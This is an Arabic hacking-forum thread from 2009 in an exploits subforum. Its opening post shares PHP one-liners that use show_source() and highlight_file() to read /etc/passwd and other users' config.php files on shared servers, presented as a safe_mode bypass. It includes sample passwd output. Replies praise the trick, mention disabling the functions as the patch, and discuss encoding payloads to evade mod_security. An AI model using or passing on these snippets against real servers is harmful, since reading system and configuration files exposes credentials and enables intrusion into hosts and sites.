المشاركة في الموضوع

  #1  
قديم 01-04-2009, 08:16 PM
الصورة الرمزية لـ Super-Crystal
Super-Crystal Super-Crystal متصل الآن
رَُبان ْ هاَلمرَكبْ !
 
تاريخ التّسجيل: Oct 2006
الإقامة: Saudi Arabic
المشاركات: 1,436
شكراً: 25
تم شكره 45 مرة في 20 مشاركة
Super-Crystal قام بإلغاء خاصية الترشيح
إرسال رسالة عبر MSN إلى Super-Crystal إرسال رسالة عبر بريد الياهو إلى Super-Crystal Send a message via Skype™ to Super-Crystal
Talking php4.x php5.2.x all show_source (bypass)safe_mode off


Credit: Super-Crystal
safe_mode off (tested)
كود PHP:
<?
show_source (’/etc/passwd’);
?>
———————–
كود PHP:
<?
show_source (’/home/user/public_html/config.php’);
?>
كود PHP:
<?
highlight_file (”/etc/passwd”);
?>
كود:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
priv8 now
until tomorrow
__________________
أنا وحَبيبتي وأغاني محمّد عبدٌه !

رد مع اقتباس

  #2  
قديم 01-04-2009, 08:32 PM
الصورة الرمزية لـ Al-AlaME
Al-AlaME Al-AlaME متصل الآن
العـــالمـــي
 
تاريخ التّسجيل: Oct 2006
الإقامة: قـــلـــミ♡彡 ــبـي
المشاركات: 1,424
شكراً: 30
تم شكره 5 مرة في 6 مشاركة
Al-AlaME is on a distinguished road
افتراضي

الرد رقم 1 - محجوز :d

ولي عودة
__________________
رد مع اقتباس

  #3  
قديم 01-04-2009, 08:36 PM
الصورة الرمزية لـ mex
mex mex غير متصل
Mr:H3STYR!A
 
تاريخ التّسجيل: Sep 2008
المشاركات: 115
شكراً: 0
تم شكره 1 مرة في 1 مشاركة
mex is on a distinguished road
افتراضي

محجوز 2


__________________

رد مع اقتباس

  #4  
قديم 01-04-2009, 11:08 PM
Djekmani4ever Djekmani4ever غير متصل
Adur[ IT ] Team
 
تاريخ التّسجيل: Sep 2008
المشاركات: 70
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
Djekmani4ever is on a distinguished road
إرسال رسالة عبر MSN إلى Djekmani4ever
افتراضي

وان اضفنا تلك الدوال لdisables-function
__________________
مدونتي
ليس مهم ان تقول كل ما تعرف .. بل يجب ان تعرف كل ما تقول
رد مع اقتباس

  #5  
قديم 01-04-2009, 11:31 PM
الصورة الرمزية لـ Super-Crystal
Super-Crystal Super-Crystal متصل الآن
رَُبان ْ هاَلمرَكبْ !
 
تاريخ التّسجيل: Oct 2006
الإقامة: Saudi Arabic
المشاركات: 1,436
شكراً: 25
تم شكره 45 مرة في 20 مشاركة
Super-Crystal قام بإلغاء خاصية الترشيح
إرسال رسالة عبر MSN إلى Super-Crystal إرسال رسالة عبر بريد الياهو إلى Super-Crystal Send a message via Skype™ to Super-Crystal
افتراضي

المشاركة الأصلية بواسطة Djekmani4ever مشاهدة مشاركة
وان اضفنا تلك الدوال لdisables-function
هلابالاستاذ نعم هذا هو الترقيع لها وقمت بطرحه بموضوع سابق هنا
__________________
أنا وحَبيبتي وأغاني محمّد عبدٌه !

رد مع اقتباس

  #6  
قديم 01-04-2009, 11:43 PM
الصورة الرمزية لـ Big Boss
Big Boss Big Boss غير متصل
WANTED
 
تاريخ التّسجيل: Sep 2008
الإقامة: UK
المشاركات: 94
شكراً: 2
تم شكره 1 مرة في 1 مشاركة
Big Boss is on a distinguished road
افتراضي

السلام عليكم

طبعا اهنيك ياسوبر على الطرح الرائع

الي يدل على عقلية شيطنبوتية عملاقة ..

ياخوان من كان يتخيل إن دالتين مثل هذي اسهى عنها كل خبراء الحماية

لان عملها مو فقط قراءة يإخوان لها عمل اخر ..

وماكان احد متخيل ان هالدوال راح تسبب تخطي لقراءة ملف ليوزر معين على السيرفر او ملف passwd

التفكير بها الشي بحد ذاته انتاج وإبتكار وطرح لذيذ بنكهة شيطنبوتية ..

مأقول غير الله يوفق سوبر على طروحه الرائعة وشروحه الممتازة

ومن هذا الشرح استفدنا ياخوان انك تعلم ان الشخص مايستهين حتى بأصغر شي بالحماية ممكن يسبب كارثة

بالتوفيق للإخوان

دمتم بود ..
__________________
You're asking me To feel the things you never show
رد مع اقتباس

  #7  
قديم 01-05-2009, 12:45 AM
هبووب الشمال هبووب الشمال غير متصل
Member
 
تاريخ التّسجيل: Sep 2008
المشاركات: 2
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
هبووب الشمال is on a distinguished road
افتراضي

إبدآع ،، طيب ،،

يعني لو كآن مشفر بالـBase64 بتخطى الترقيع ؟!!

اللي أنت منزله ؟!

أنتضر ردك
رد مع اقتباس

  #8  
قديم 01-05-2009, 03:15 AM
الصورة الرمزية لـ Super-Crystal
Super-Crystal Super-Crystal متصل الآن
رَُبان ْ هاَلمرَكبْ !
 
تاريخ التّسجيل: Oct 2006
الإقامة: Saudi Arabic
المشاركات: 1,436
شكراً: 25
تم شكره 45 مرة في 20 مشاركة
Super-Crystal قام بإلغاء خاصية الترشيح
إرسال رسالة عبر MSN إلى Super-Crystal إرسال رسالة عبر بريد الياهو إلى Super-Crystal Send a message via Skype™ to Super-Crystal
افتراضي

BigBoss ابوبندر ردك اخجلني صراحة ٍ ولو هذا شئ متواضع ...



-----------------

هبوب الشمال ماله علاقه تشفير الداله لانها محجوبه صحيح لو كان مود سكيورتي ممكن تشفرها وتنجح معاك ...
__________________
أنا وحَبيبتي وأغاني محمّد عبدٌه !

رد مع اقتباس

  #9  
قديم 01-05-2009, 05:04 AM
الصورة الرمزية لـ خـُرافـي
خـُرافـي خـُرافـي غير متصل
Member
 
تاريخ التّسجيل: Sep 2008
المشاركات: 97
شكراً: 6
تم شكره 0 مرة في 0 مشاركة
خـُرافـي is on a distinguished road
افتراضي

مآ أزيد على درر أبو بندر ..

بارك الله فيك
__________________


S 00 N






رد مع اقتباس

  #10  
قديم 01-05-2009, 11:10 AM
الصورة الرمزية لـ dEV!L-nEt
dEV!L-nEt dEV!L-nEt غير متصل
root@h34rt
 
تاريخ التّسجيل: Sep 2008
المشاركات: 123
شكراً: 3
تم شكره 0 مرة في 0 مشاركة
dEV!L-nEt is on a distinguished road
إرسال رسالة عبر MSN إلى dEV!L-nEt Send a message via Skype™ to dEV!L-nEt
افتراضي

ماشاء الله عليك يا سوبر

عقلية نظيفة

كثر الله من امثالك ان شاء الله

لي رجعة ان شاء الله ,,
رد مع اقتباس
المشاركة في الموضوع


مواضيع مشابهة
الموضوع كاتب الموضوع المنتدى الردود آخر مشاركة
php4.x php5.2.x all show_source (bypass)safe_mode off Super-Crystal إكتشافاتنا [Exploits] 17 01-08-2009 12:32 AM

عدد الأعضاء الذي يتصفحون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

خيارات الموضوع بحث في هذا الموضوع
بحث في هذا الموضوع:

بحث متقدم
طريقة العرض قيّم هذا الموضوع
قيّم هذا الموضوع:

قوانين المشاركة
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is متاح
كود [IMG] متاح
كود HTML غير متاح

الانتقال السريع

إن كل طرح هو وجهة نظر خاصة بصاحبه توافقت مع معتقداتك أم لم تتفق !



خدمات العرب
أنت قيّمت هذا الموضوع: